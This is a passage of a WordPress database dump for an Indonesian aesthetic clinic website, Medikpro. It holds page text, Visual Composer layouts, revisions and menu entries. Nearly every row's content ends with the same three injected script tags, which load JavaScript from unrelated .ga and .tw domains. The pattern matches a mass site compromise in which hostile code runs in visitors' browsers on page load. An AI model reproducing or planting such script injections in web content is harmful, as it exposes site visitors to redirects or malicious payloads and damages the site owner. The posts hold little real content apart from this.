terbaik dalam menangani berbagai permasalahan kulit.\r\n\r\n&nbsp;\r\n\r\n<strong>Misi</strong>\r\n<ol>\r\n 	<li>Memberikan layanan perawatan kulit dan tubuh yang didukung dengan teknologi dan inovasi terkini.</li>\r\n 	<li>Memberikan solusi treatment yang tepat dan aman.</li>\r\n 	<li>Memberikan pelayanan yang berkualitas, terjamin dan selalu mengutamakan kebutuhan customer.</li>\r\n 	<li>Memberikan hasil yang memuaskan dan terpercaya.</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Visi & Misi Medikpro','','publish','closed','closed','','tentan-medikpro-3','','','2017-12-27 04:56:06','2017-12-27 04:56:06','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6260',0,'page','',0),(6261,1,'2017-12-27 04:56:06','2017-12-27 04:56:06','<strong>Visi</strong>\r\n\r\nMenjadi klinik aesthetic terkemuka di Indonesia untuk memberikan pengalaman terbaik dalam menangani berbagai permasalahan kulit.\r\n\r\n&nbsp;\r\n\r\n<strong>Misi</strong>\r\n<ol>\r\n 	<li>Memberikan layanan perawatan kulit dan tubuh yang didukung dengan teknologi dan inovasi terkini.</li>\r\n 	<li>Memberikan solusi treatment yang tepat dan aman.</li>\r\n 	<li>Memberikan pelayanan yang berkualitas, terjamin dan selalu mengutamakan kebutuhan customer.</li>\r\n 	<li>Memberikan hasil yang memuaskan dan terpercaya.</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Visi & Misi Medikpro','','inherit','closed','closed','','6260-revision-v1','','','2017-12-27 04:56:06','2017-12-27 04:56:06','',6260,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6260-revision-v1/',0,'revision','',0),(6262,1,'2017-12-27 04:56:36','2017-12-27 04:56:36',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6262','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6262',5,'nav_menu_item','',0),(6263,1,'2017-12-27 04:59:35','2017-12-27 04:59:35','Filosofi dari Medikpro berasal dari kata Medik yang berarti berhubungan dengan pengobatan dan juga pro adalah singkatan dari professional dalam arti mengobati secara professional. Pada bagian atas tulisan Pro, di sebelah kanan terdapat logo daun berwarna biru yang memiliki arti bahwa warna biru merupakan warna tenang dan bersifat professional. Dengan latar belakang yang berwarna putih memberikan kesan steril, bersih dan juga segar.\r\n\r\nDalam hal ini Medikpro memiliki konsep warna yaitu biru dan juga putih yang didukung dengan ruangan yang sebagian besar berwarna putih serta kemasan produk yang digunakan berwarna biru yang melambangkan kesegaran.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Filosofi Medikpro','','publish','closed','closed','','tentan-medikpro-2-2','','','2017-12-27 04:59:35','2017-12-27 04:59:35','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6263',0,'page','',0),(6264,1,'2017-12-27 04:59:35','2017-12-27 04:59:35','Filosofi dari Medikpro berasal dari kata Medik yang berarti berhubungan dengan pengobatan dan juga pro adalah singkatan dari professional dalam arti mengobati secara professional. Pada bagian atas tulisan Pro, di sebelah kanan terdapat logo daun berwarna biru yang memiliki arti bahwa warna biru merupakan warna tenang dan bersifat professional. Dengan latar belakang yang berwarna putih memberikan kesan steril, bersih dan juga segar.\r\n\r\nDalam hal ini Medikpro memiliki konsep warna yaitu biru dan juga putih yang didukung dengan ruangan yang sebagian besar berwarna putih serta kemasan produk yang digunakan berwarna biru yang melambangkan kesegaran.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Filosofi Medikpro','','inherit','closed','closed','','6263-revision-v1','','','2017-12-27 04:59:35','2017-12-27 04:59:35','',6263,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6263-revision-v1/',0,'revision','',0),(6265,1,'2017-12-27 05:00:21','2017-12-27 05:00:21',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6265','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6265',6,'nav_menu_item','',0),(6266,1,'2017-12-27 05:01:00','2017-12-27 05:01:00','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Aesthetic Solutions','','publish','closed','closed','','aesthetic-solutions','','','2017-12-27 05:01:00','2017-12-27 05:01:00','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6266',0,'page','',0),(6267,1,'2017-12-27 05:01:00','2017-12-27 05:01:00','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Aesthetic Solutions','','inherit','closed','closed','','6266-revision-v1','','','2017-12-27 05:01:00','2017-12-27 05:01:00','',6266,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6266-revision-v1/',0,'revision','',0),(6268,1,'2017-12-27 05:01:56','2017-12-27 05:01:56',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6268','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6268',7,'nav_menu_item','',0),(6269,1,'2017-12-27 05:02:24','2017-12-27 05:02:24','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"6619\" bg_position=\"center top\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1515632507253{padding-top: 20px !important;padding-bottom: 20px !important;}\"]\r\n<h2>Facial Treatment</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6634\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"120\" link_url=\"http://sandbox.futuremediatrix.com/medikpro/facial-treatment-2/\" link_text=\"More Information\" css=\".vc_custom_1515633262229{padding-top: 15px !important;padding-right: 15px !important;padding-bottom: 15px !important;padding-left: 15px !important;}\"]\r\n<h4>4D Laser Face Lifting</h4>\r\nLorem ipsum dolor sit amet[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6634\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"120\" link_url=\"http://sandbox.futuremediatrix.com/medikpro/facial-treatment-2/\" link_text=\"More Information\" css=\".vc_custom_1515633293772{padding-top: 15px !important;padding-right: 15px !important;padding-bottom: 15px !important;padding-left: 15px !important;}\"]\r\n<h4>3D Rejuvenation</h4>\r\nLorem ipsum dolor sit amet[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6634\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"120\" link_url=\"http://sandbox.futuremediatrix.com/medikpro/facial-treatment-2/\" link_text=\"More Information\" css=\".vc_custom_1515633307261{padding-top: 15px !important;padding-right: 15px !important;padding-bottom: 15px !important;padding-left: 15px !important;}\"]\r\n<h4>Anti Wrinkle Injection</h4>\r\nLorem ipsum dolor sit amet[/fancy_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','publish','closed','closed','','aesthetic-solutions-2','','','2018-01-11 01:15:14','2018-01-11 01:15:14','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6269',0,'page','',0),(6270,1,'2017-12-27 05:02:24','2017-12-27 05:02:24','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','inherit','closed','closed','','6269-revision-v1','','','2017-12-27 05:02:24','2017-12-27 05:02:24','',6269,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6269-revision-v1/',0,'revision','',0),(6271,1,'2017-12-27 05:03:22','2017-12-27 05:03:22',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6271','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6271',8,'nav_menu_item','',0),(6272,1,'2017-12-27 05:04:23','2017-12-27 05:04:23','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Advanced','','publish','closed','closed','','aesthetic-solutions-3','','','2017-12-27 05:04:23','2017-12-27 05:04:23','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6272',0,'page','',0),(6273,1,'2017-12-27 05:04:23','2017-12-27 05:04:23','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Advanced','','inherit','closed','closed','','6272-revision-v1','','','2017-12-27 05:04:23','2017-12-27 05:04:23','',6272,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6272-revision-v1/',0,'revision','',0),(6274,1,'2017-12-27 05:04:48','2017-12-27 05:04:48',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6274','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6274',19,'nav_menu_item','',0),(6275,1,'2017-12-27 05:05:39','2017-12-27 05:05:39','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Laser Therapy','','publish','closed','closed','','aesthetic-solutions-4','','','2017-12-28 03:22:04','2017-12-28 03:22:04','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6275',0,'page','',0),(6276,1,'2017-12-27 05:05:39','2017-12-27 05:05:39','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Laser Advanced','','inherit','closed','closed','','6275-revision-v1','','','2017-12-27 05:05:39','2017-12-27 05:05:39','',6275,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6275-revision-v1/',0,'revision','',0),(6277,1,'2017-12-27 05:10:37','2017-12-27 05:10:37',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6277','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6277',32,'nav_menu_item','',0),(6278,1,'2017-12-27 05:11:33','2017-12-27 05:11:33','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Laser Hair Removal','','publish','closed','closed','','aesthetic-solutions-5','','','2017-12-27 05:11:33','2017-12-27 05:11:33','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6278',0,'page','',0),(6279,1,'2017-12-27 05:11:33','2017-12-27 05:11:33','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Laser Hair Removal','','inherit','closed','closed','','6278-revision-v1','','','2017-12-27 05:11:33','2017-12-27 05:11:33','',6278,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6278-revision-v1/',0,'revision','',0),(6280,1,'2017-12-27 05:12:09','2017-12-27 05:12:09',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6280','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6280',47,'nav_menu_item','',0),(6281,1,'2017-12-27 05:12:37','2017-12-27 05:12:37','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Slimming Treatment','','publish','closed','closed','','aesthetic-solutions-6','','','2017-12-27 05:12:37','2017-12-27 05:12:37','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6281',0,'page','',0),(6282,1,'2017-12-27 05:12:37','2017-12-27 05:12:37','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Slimming Treatment','','inherit','closed','closed','','6281-revision-v1','','','2017-12-27 05:12:37','2017-12-27 05:12:37','',6281,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6281-revision-v1/',0,'revision','',0),(6283,1,'2017-12-27 05:13:08','2017-12-27 05:13:08',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6283','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6283',54,'nav_menu_item','',0),(6284,1,'2017-12-27 05:13:31','2017-12-27 05:13:31','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Body Laser Therapy','','publish','closed','closed','','aesthetic-solutions-7','','','2017-12-27 05:13:31','2017-12-27 05:13:31','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6284',0,'page','',0),(6285,1,'2017-12-27 05:13:31','2017-12-27 05:13:31','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Body Laser Therapy','','inherit','closed','closed','','6284-revision-v1','','','2017-12-27 05:13:31','2017-12-27 05:13:31','',6284,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6284-revision-v1/',0,'revision','',0),(6286,1,'2017-12-27 05:13:57','2017-12-27 05:13:57',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6286','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6286',58,'nav_menu_item','',0),(6287,1,'2017-12-27 05:22:57','2017-12-27 05:22:57','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Sulam Alis','','publish','closed','closed','','aesthetic-solutions-8','','','2017-12-27 05:22:57','2017-12-27 05:22:57','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6287',0,'page','',0),(6288,1,'2017-12-27 05:22:57','2017-12-27 05:22:57','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Sulam Alis','','inherit','closed','closed','','6287-revision-v1','','','2017-12-27 05:22:57','2017-12-27 05:22:57','',6287,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6287-revision-v1/',0,'revision','',0),(6289,1,'2017-12-27 05:23:40','2017-12-27 05:23:40',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6289','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6289',68,'nav_menu_item','',0),(6290,1,'2017-12-27 05:25:28','2017-12-27 05:25:28','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Korea Treatment','','publish','closed','closed','','aesthetic-solutions-9','','','2017-12-27 05:25:28','2017-12-27 05:25:28','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6290',0,'page','',0),(6291,1,'2017-12-27 05:25:28','2017-12-27 05:25:28','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Korea Treatment','','inherit','closed','closed','','6290-revision-v1','','','2017-12-27 05:25:28','2017-12-27 05:25:28','',6290,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6290-revision-v1/',0,'revision','',0),(6292,1,'2017-12-27 05:26:44','2017-12-27 05:26:44',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6292','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6292',72,'nav_menu_item','',0),(6293,1,'2017-12-27 05:27:08','2017-12-27 05:27:08','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Injection Treatments','','publish','closed','closed','','aesthetic-solutions-10','','','2017-12-27 05:27:08','2017-12-27 05:27:08','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6293',0,'page','',0),(6294,1,'2017-12-27 05:27:08','2017-12-27 05:27:08','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Injection Treatments','','inherit','closed','closed','','6293-revision-v1','','','2017-12-27 05:27:08','2017-12-27 05:27:08','',6293,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6293-revision-v1/',0,'revision','',0),(6295,1,'2017-12-27 05:27:47','2017-12-27 05:27:47',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6295','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6295',81,'nav_menu_item','',0),(6320,1,'2017-12-27 05:32:05','2017-12-27 05:32:05','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Cosmetic Treatment','','publish','closed','closed','','aesthetic-solutions-11','','','2017-12-27 05:32:05','2017-12-27 05:32:05','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6320',0,'page','',0),(6349,1,'2017-12-27 05:32:05','2017-12-27 05:32:05','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Cosmetic Treatment','','inherit','closed','closed','','6320-revision-v1','','','2017-12-27 05:32:05','2017-12-27 05:32:05','',6320,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6320-revision-v1/',0,'revision','',0),(6350,1,'2017-12-27 05:32:50','2017-12-27 05:32:50',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6350','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6350',90,'nav_menu_item','',0),(6353,1,'2017-12-27 05:33:14','2017-12-27 05:33:14','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Beauty Lounge','','publish','closed','closed','','beauty-lounge','','','2017-12-27 05:33:14','2017-12-27 05:33:14','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6353',0,'page','',0),(6354,1,'2017-12-27 05:33:14','2017-12-27 05:33:14','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Beauty Lounge','','inherit','closed','closed','','6353-revision-v1','','','2017-12-27 05:33:14','2017-12-27 05:33:14','',6353,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6353-revision-v1/',0,'revision','',0),(6355,1,'2017-12-27 05:33:40','2017-12-27 05:33:40',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6355','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6355',94,'nav_menu_item','',0),(6356,1,'2017-12-27 05:39:06','2017-12-27 05:39:06','[vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][recent_posts style=\"default\" category=\"all\" columns=\"1\" 